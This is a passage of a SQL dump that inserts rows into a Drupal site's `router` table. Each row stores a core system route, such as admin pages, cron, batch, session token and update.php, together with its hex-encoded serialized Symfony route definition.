('system.admin_index', '/admin/index', '/admin/index', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31323a222f61646d696e2f696e646578223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c41646d696e436f6e74726f6c6c65723a3a696e646578223b733a363a225f7469746c65223b733a31343a2241646d696e697374726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31393a227b5e2f61646d696e2f696e646578247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f61646d696e2f696e646578223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31323a222f61646d696e2f696e646578223b733a383a226e756d5061727473223b693a323b7d7d, 2);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('system.admin_reports', '/admin/reports', '/admin/reports', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f61646d696e2f7265706f727473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a373a225265706f727473223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f61646d696e2f7265706f727473247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f61646d696e2f7265706f727473223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f61646d696e2f7265706f727473223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.admin_structure', '/admin/structure', '/admin/structure', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31363a222f61646d696e2f737472756374757265223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a393a22537472756374757265223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32333a227b5e2f61646d696e2f737472756374757265247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f61646d696e2f737472756374757265223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31363a222f61646d696e2f737472756374757265223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.batch_page.html', '/batch', '/batch', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a363a222f6261746368223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c4261746368436f6e74726f6c6c65723a3a626174636850616765223b733a31353a225f7469746c655f63616c6c6261636b223b733a35373a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c4261746368436f6e74726f6c6c65723a3a6261746368506167655469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a373a225f616363657373223b733a343a2254525545223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31323a225f6e6f5f6269675f70697065223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31333a227b5e2f6261746368247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6261746368223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a363a222f6261746368223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('system.batch_page.json', '/batch', '/batch', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a363a222f6261746368223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c4261746368436f6e74726f6c6c65723a3a626174636850616765223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a373a225f616363657373223b733a343a2254525545223b733a373a225f666f726d6174223b733a343a226a736f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31333a227b5e2f6261746368247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6261746368223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a363a222f6261746368223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('system.cron', '/cron/{key}', '/cron/%', 2, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31313a222f63726f6e2f7b6b65797d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a33343a225c44727570616c5c73797374656d5c43726f6e436f6e74726f6c6c65723a3a72756e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31393a225f6163636573735f73797374656d5f63726f6e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a383a226e6f5f6361636865223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31373a226163636573735f636865636b2e63726f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a333a226b6579223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f63726f6e2f283f503c6b65793e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a226b6579223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f63726f6e223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a333a226b6579223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323b733a31343a227061747465726e4f75746c696e65223b733a373a222f63726f6e2f25223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.cron_settings', '/admin/config/system/cron', '/admin/config/system/cron', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f636f6e6669672f73797374656d2f63726f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a32383a225c44727570616c5c73797374656d5c466f726d5c43726f6e466f726d223b733a363a225f7469746c65223b733a343a2243726f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f636f6e6669672f73797374656d2f63726f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f636f6e6669672f73797374656d2f63726f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f636f6e6669672f73797374656d2f63726f6e223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.csrftoken', '/session/token', '/session/token', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f73657373696f6e2f746f6b656e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c43737266546f6b656e436f6e74726f6c6c65723a3a63737266546f6b656e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f73657373696f6e2f746f6b656e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f73657373696f6e2f746f6b656e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f73657373696f6e2f746f6b656e223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.css_asset', '/sites/default/files/css/{file_name}', '/sites/default/files/css/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f73697465732f64656661756c742f66696c65732f6373732f7b66696c655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a2244727570616c5c73797374656d5c436f6e74726f6c6c65725c4373734173736574436f6e74726f6c6c65723a3a64656c69766572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a2266696c655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35333a227b5e2f73697465732f64656661756c742f66696c65732f6373732f283f503c66696c655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a2266696c655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f73697465732f64656661756c742f66696c65732f637373223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a2266696c655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32363a222f73697465732f64656661756c742f66696c65732f6373732f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('system.date_format_add', '/admin/config/regional/date-time/formats/add', '/admin/config/regional/date-time/formats/add', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34343a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31353a22646174655f666f726d61742e616464223b733a363a225f7469746c65223b733a31353a22416464206461746520666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35323a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('system.db_update', '/update.php/{op}', '/update.php', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31363a222f7570646174652e7068702f7b6f707d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a323a226f70223b733a343a22696e666f223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f6163636573735f73797374656d5f757064617465223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31393a2264656661756c745f75726c5f6f7074696f6e73223b613a313a7b733a31353a22706174685f70726f63657373696e67223b623a303b7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32323a226163636573735f636865636b2e64625f757064617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a323a226f70223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f7570646174655c2e706870283f3a2f283f503c6f703e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a323a226f70223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f7570646174652e706870223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a323a226f70223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a31313a222f7570646174652e706870223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.development_settings', '/admin/config/development/settings', '/admin/config/development/settings', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34333a225c44727570616c5c73797374656d5c466f726d5c446576656c6f706d656e7453657474696e6773466f726d223b733a363a225f7469746c65223b733a32303a22446576656c6f706d656e742073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f73657474696e6773223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.entity_autocomplete', '/entity_reference_autocomplete/{target_type}/{selection_handler}/{selection_settings_key}', '/entity_reference_autocomplete/%/%/%', 8, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f656e746974795f7265666572656e63655f6175746f636f6d706c6574652f7b7461726765745f747970657d2f7b73656c656374696f6e5f68616e646c65727d2f7b73656c656374696f6e5f73657474696e67735f6b65797d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37343a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c456e746974794175746f636f6d706c657465436f6e74726f6c6c65723a3a68616e646c654175746f636f6d706c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31313a227461726765745f74797065223b693a313b733a31373a2273656c656374696f6e5f68616e646c6572223b693a323b733a32323a2273656c656374696f6e5f73657474696e67735f6b6579223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132363a227b5e2f656e746974795f7265666572656e63655f6175746f636f6d706c6574652f283f503c7461726765745f747970653e5b5e2f5d2b2b292f283f503c73656c656374696f6e5f68616e646c65723e5b5e2f5d2b2b292f283f503c73656c656374696f6e5f73657474696e67735f6b65793e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a2273656c656374696f6e5f73657474696e67735f6b6579223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a2273656c656374696f6e5f68616e646c6572223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227461726765745f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33303a222f656e746974795f7265666572656e63655f6175746f636f6d706c657465223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31313a227461726765745f74797065223b693a313b733a31373a2273656c656374696f6e5f68616e646c6572223b693a323b733a32323a2273656c656374696f6e5f73657474696e67735f6b6579223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a383b733a31343a227061747465726e4f75746c696e65223b733a33363a222f656e746974795f7265666572656e63655f6175746f636f6d706c6574652f252f252f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
